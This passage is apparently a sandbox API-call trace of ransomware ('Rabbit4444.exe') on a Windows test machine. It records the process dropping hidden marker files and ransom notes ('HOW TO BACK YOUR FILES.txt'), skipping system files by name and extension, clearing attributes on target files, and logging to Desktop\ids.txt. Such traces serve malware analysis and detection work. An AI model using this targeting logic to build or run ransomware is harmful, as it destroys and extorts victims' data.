lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3" [0066.987] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\tempstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.989] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.991] FlushFileBuffers (hFile=0x228) returned 1 [0066.992] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.992] CloseHandle (hObject=0x228) returned 1 [0066.993] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\TempState") returned 88 [0066.993] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.993] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\TempState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x814d4f06, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd095f4e0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf1400cf2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0066.993] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.993] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.993] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.993] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.993] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x814d4f06, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd095f4e0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf1400cf2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.993] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.993] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.993] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.993] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.993] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.993] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf1400cf2, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf1400cf2, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf1400cf2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.993] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.993] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.993] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf1400cf2, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf1400cf2, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf1400cf2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0066.993] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0066.994] lstrcpyW (in: lpString1=0x130ebea, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.994] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\TempState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\tempstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.994] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.994] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.995] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.995] CloseHandle (hObject=0x27c) returned 1 [0066.995] CloseHandle (hObject=0x228) returned 1 [0066.995] GetCurrentThreadId () returned 0xd98 [0066.995] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122288 [0066.995] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SystemAppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SystemAppData" [0066.995] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xefb28 | out: hHeap=0xe0000) returned 1 [0066.995] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122280 | out: hHeap=0xe0000) returned 1 [0066.995] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SystemAppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SystemAppData" [0066.995] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SystemAppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SystemAppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SystemAppData\\" [0066.995] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SystemAppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3" [0066.995] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\systemappdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.997] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.999] FlushFileBuffers (hFile=0x228) returned 1 [0067.000] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0067.000] CloseHandle (hObject=0x228) returned 1 [0067.001] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SystemAppData") returned 92 [0067.001] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0067.001] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SystemAppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xda246550, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xda246550, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xf1427283, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102990 [0067.001] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.001] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0067.001] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0067.001] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0067.001] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xda246550, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xda246550, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xf1427283, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.001] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.001] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0067.001] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0067.001] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0067.001] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0067.001] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf1427283, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf1427283, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf1427283, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0067.001] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.001] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0067.001] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf1427283, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf1427283, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf1427283, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0067.001] FindClose (in: hFindFile=0x102990 | out: hFindFile=0x102990) returned 1 [0067.002] lstrcpyW (in: lpString1=0x130ebf2, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0067.002] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SystemAppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\systemappdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0067.002] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0067.002] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0067.003] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.003] CloseHandle (hObject=0x27c) returned 1 [0067.003] CloseHandle (hObject=0x228) returned 1 [0067.003] GetCurrentThreadId () returned 0xd98 [0067.003] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222a8 [0067.003] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Settings", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Settings" [0067.003] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123b20 | out: hHeap=0xe0000) returned 1 [0067.003] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222a0 | out: hHeap=0xe0000) returned 1 [0067.003] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Settings" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Settings" [0067.003] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Settings", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Settings\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Settings\\" [0067.003] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Settings\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3" [0067.003] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\settings\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0067.104] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0067.107] FlushFileBuffers (hFile=0x228) returned 1 [0067.108] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0067.108] CloseHandle (hObject=0x228) returned 1 [0067.109] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Settings") returned 87 [0067.109] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0067.109] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Settings\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x814fb197, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x712cc700, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xf1427283, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a50 [0067.109] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.109] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0067.109] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0067.109] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0067.109] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x814fb197, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x712cc700, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xf1427283, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.109] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.109] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0067.109] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0067.109] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0067.109] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0067.109] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf1427283, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf1427283, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf1531fa1, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0067.109] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.109] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0067.109] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x814fb197, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x814fb197, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x814fb197, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0067.109] lstrcmpiW (lpString1="roaming.lock", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0067.109] lstrcmpiW (lpString1="roaming.lock", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.110] lstrcmpiW (lpString1="roaming.lock", lpString2="Rabbit4444.exe") returned 1 [0067.110] lstrcmpiW (lpString1="roaming.lock", lpString2=".") returned 1 [0067.110] lstrcmpiW (lpString1="roaming.lock", lpString2="..") returned 1 [0067.110] lstrcmpiW (lpString1="roaming.lock", lpString2="windows") returned -1 [0067.110] lstrcmpiW (lpString1="roaming.lock", lpString2="bootmgr") returned 1 [0067.110] lstrcmpiW (lpString1="roaming.lock", lpString2="pagefile.sys") returned 1 [0067.110] lstrcmpiW (lpString1="roaming.lock", lpString2="boot") returned 1 [0067.110] lstrcmpiW (lpString1="roaming.lock", lpString2="ids.txt") returned 1 [0067.110] lstrcmpiW (lpString1="roaming.lock", lpString2="NTUSER.DAT") returned 1 [0067.110] lstrcpyW (in: lpString1=0x130ebe8, lpString2="roaming.lock" | out: lpString1="roaming.lock") returned="roaming.lock" [0067.110] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Settings\\roaming.lock", dwFileAttributes=0x0) returned 1 [0067.110] lstrlenW (lpString="roaming.lock") returned 12 [0067.110] lstrlenW (lpString="Rabbit4444") returned 10 [0067.110] lstrcmpiW (lpString1="aming.lock", lpString2="Rabbit4444") returned -1 [0067.110] lstrlenW (lpString=".dll") returned 4 [0067.110] lstrcmpiW (lpString1="lock", lpString2=".dll") returned 1 [0067.110] lstrlenW (lpString=".lnk") returned 4 [0067.110] lstrcmpiW (lpString1="lock", lpString2=".lnk") returned 1 [0067.111] lstrlenW (lpString=".ini") returned 4 [0067.111] lstrcmpiW (lpString1="lock", lpString2=".ini") returned 1 [0067.111] lstrlenW (lpString=".sys") returned 4 [0067.111] lstrcmpiW (lpString1="lock", lpString2=".sys") returned 1 [0067.111] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x814fb197, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xa94ec9d0, ftLastAccessTime.dwHighDateTime=0x1d4d5d3, ftLastWriteTime.dwLowDateTime=0xa94ec9d0, ftLastWriteTime.dwHighDateTime=0x1d4d5d3, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0067.111] lstrcmpiW (lpString1="settings.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0067.111] lstrcmpiW (lpString1="settings.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.111] lstrcmpiW (lpString1="settings.dat", lpString2="Rabbit4444.exe") returned 1 [0067.111] lstrcmpiW (lpString1="settings.dat", lpString2=".") returned 1 [0067.111] lstrcmpiW (lpString1="settings.dat", lpString2="..") returned 1 [0067.111] lstrcmpiW (lpString1="settings.dat", lpString2="windows") returned -1 [0067.111] lstrcmpiW (lpString1="settings.dat", lpString2="bootmgr") returned 1 [0067.111] lstrcmpiW (lpString1="settings.dat", lpString2="pagefile.sys") returned 1 [0067.111] lstrcmpiW (lpString1="settings.dat", lpString2="boot") returned 1 [0067.111] lstrcmpiW (lpString1="settings.dat", lpString2="ids.txt") returned 1 [0067.111] lstrcmpiW (lpString1="settings.dat", lpString2="NTUSER.DAT") returned 1 [0067.111] lstrcpyW (in: lpString1=0x130ebe8, lpString2="settings.dat" | out: lpString1="settings.dat") returned="settings.dat" [0067.111] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Settings\\settings.dat", dwFileAttributes=0x0) returned 1 [0067.111] lstrlenW (lpString="settings.dat") returned 12 [0067.111] lstrlenW (lpString="Rabbit4444") returned 10 [0067.111] lstrcmpiW (lpString1="ttings.dat", lpString2="Rabbit4444") returned 1 [0067.111] lstrlenW (lpString=".dll") returned 4 [0067.111] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0067.111] lstrlenW (lpString=".lnk") returned 4 [0067.111] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0067.111] lstrlenW (lpString=".ini") returned 4 [0067.111] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0067.112] lstrlenW (lpString=".sys") returned 4 [0067.112] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0067.112] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\settings\\settings.dat"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0xffffffff [0067.112] GetLastError () returned 0x20 [0067.112] wsprintfA (in: param_1=0x130d2c8, param_2="[ERROR] %S _CreateFile error %i\r\n" | out: param_1="[ERROR] C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Settings\\settings.dat _CreateFile error 32\r\n") returned 131 [0067.112] lstrlenA (lpString="[ERROR] C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Settings\\settings.dat _CreateFile error 32\r\n") returned 131 [0067.112] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0067.112] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1618 [0067.112] WriteFile (in: hFile=0x27c, 